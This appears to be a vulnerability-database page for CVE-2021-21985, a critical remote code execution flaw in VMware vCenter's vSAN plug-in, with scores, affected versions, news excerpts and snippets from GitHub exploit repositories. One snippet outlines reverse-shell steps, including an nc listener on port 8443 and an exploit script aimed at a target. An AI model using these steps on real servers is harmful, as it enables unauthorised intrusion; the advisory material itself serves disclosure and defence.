10
CVSSv2

CVE-2021-21985

Published: 26/05/2021 Updated: 03/06/2021
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

VMware vCenter Server updates address remote code execution vulnerability in the vSphere Client. The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.

Most Upvoted Vulmon Research Post

There is no Researcher post for this vulnerability
Would you like to share something about it? Sign up now to share your knowledge with the community.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

vmware vcenter server 6.5

vmware vcenter server 6.7

vmware vcenter server 7.0

vmware cloud foundation

Github Repositories

cve-2021-21985 exploit 0x01 漏洞点 分析可见: attackerkbcom/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid7-analysis 0x02 exploit 对beans对象进行重新构造,实现rce。 bean列表: localizedMessageBundle vsanWorkerThreadFactory vsanThreadPoolImpl vsanServiceBundleActivator vsanServiceFactory vsanProviderUtils_setVmodlHelper vsanProviderUtils_s

CVE-2021-21985 CVE-2021-21985 EXP 反弹Shell 本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。 1 VPS启动RMI监听 1099 端口 2 VPS启动nc监听 8443 端口 nc -lvp 8443 3 执行python脚本 python3 CVE-2021-21985_exppy <target> <rmi://ip/class&gt

CVE-2021-21985 (Vulnerable Code) CLASS/METHOD(s) available, a little sample for PoC purposes: comvmwarevsanclientservicescapabilityVsanCapabilityProvider [/snip] getClusterCapabilityData getHostCapabilityData getHostsCapabilitiyData getIsDeduplicationSupported getIsEncryptionSupported getIsLocalDataProtectionSupportedOnVc getIsLocalDataProtectionSupportedOnCluster getI

CVE-2021-21985 (Vulnerable Code) CLASS/METHOD(s) available, a little sample for PoC purposes: comvmwarevsanclientservicescapabilityVsanCapabilityProvider [/snip] getClusterCapabilityData getHostCapabilityData getHostsCapabilitiyData getIsDeduplicationSupported getIsEncryptionSupported getIsLocalDataProtectionSupportedOnVc getIsLocalDataProtectionSupportedOnCluster getI

cve-2021-21985 my poc for cve-2021-21985

CVE-2021-21985 The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 98 A malicious actor with network access to port

CVE-2021-21985 Checker Simple Powershell implementation of @alt3kx nmap script Usage \CVE-2021-21985ps1 vcenterhostnamecom Output TARGET VULNERABLE or TARGET NOT VULNERABLE

"# Project_CVE-2021-21985_PoC" "# Project_CVE-2021-21985_PoC"

Recent Articles

Attackers scan for unpatched VMware vCenter servers, PoC exploit available
BleepingComputer • Sergiu Gatlan • 04 Jun 2021

Threat actors are actively scanning for Internet-exposed VMware vCenter servers unpatched against a critical remote code execution (RCE) vulnerability impacting all vCenter deployments and 
.
The ongoing scanning activity was 
 by threat intelligence company Bad Packets yesterday and 
 earlier today by cybersecurity expert Kevin Beaumont.
Security researchers have also developed and published a proof-of-concept (PoC) RCE exploit code targeting this critical VM...

Attackers are scanning for vulnerable VMware servers, patch now!
BleepingComputer • Sergiu Gatlan • 04 Jun 2021

Threat actors are actively scanning for Internet-exposed VMware vCenter servers unpatched against a critical remote code execution (RCE) vulnerability impacting all vCenter deployments and 
.
The ongoing scanning activity was 
 by threat intelligence company Bad Packets yesterday and 
 earlier today by cybersecurity expert Kevin Beaumont.
Security researchers have also developed and published a proof-of-concept (PoC) RCE exploit code targeting this critical VM...

VMware reveals critical vCenter hole it says ‘needs to be considered at once’
The Register • Simon Sharwood, APAC Editor • 26 May 2021

Unauthenticated remote code execution possible thanks to vSphere Client bug

VMware has revealed a critical bug that can be exploited to achieve unauthenticated remote code execution in the very core of a virtualised system – vCenter Server.
The culprit is the vSphere HTML5 client, which by default includes the Virtual SAN Health plugin – even if you don’t run a VMware VSAN. That plugin lacks input validation and the result, as explained by VMware’s advisory this week, is: “A malicious actor with network access to port 443 may exploit this issue to execut...

The Register

VMware has revealed a critical bug that can be exploited to achieve unauthenticated remote code execution in the very core of a virtualised system – vCenter Server.
The culprit is the vSphere HTML5 client, which by default includes the Virtual SAN Health plugin – even if you don’t run a VMware VSAN. That plugin lacks input validation and the result, as explained by VMware’s advisory this week, is: “A malicious actor with network access to port 443 may exploit this issue to execut...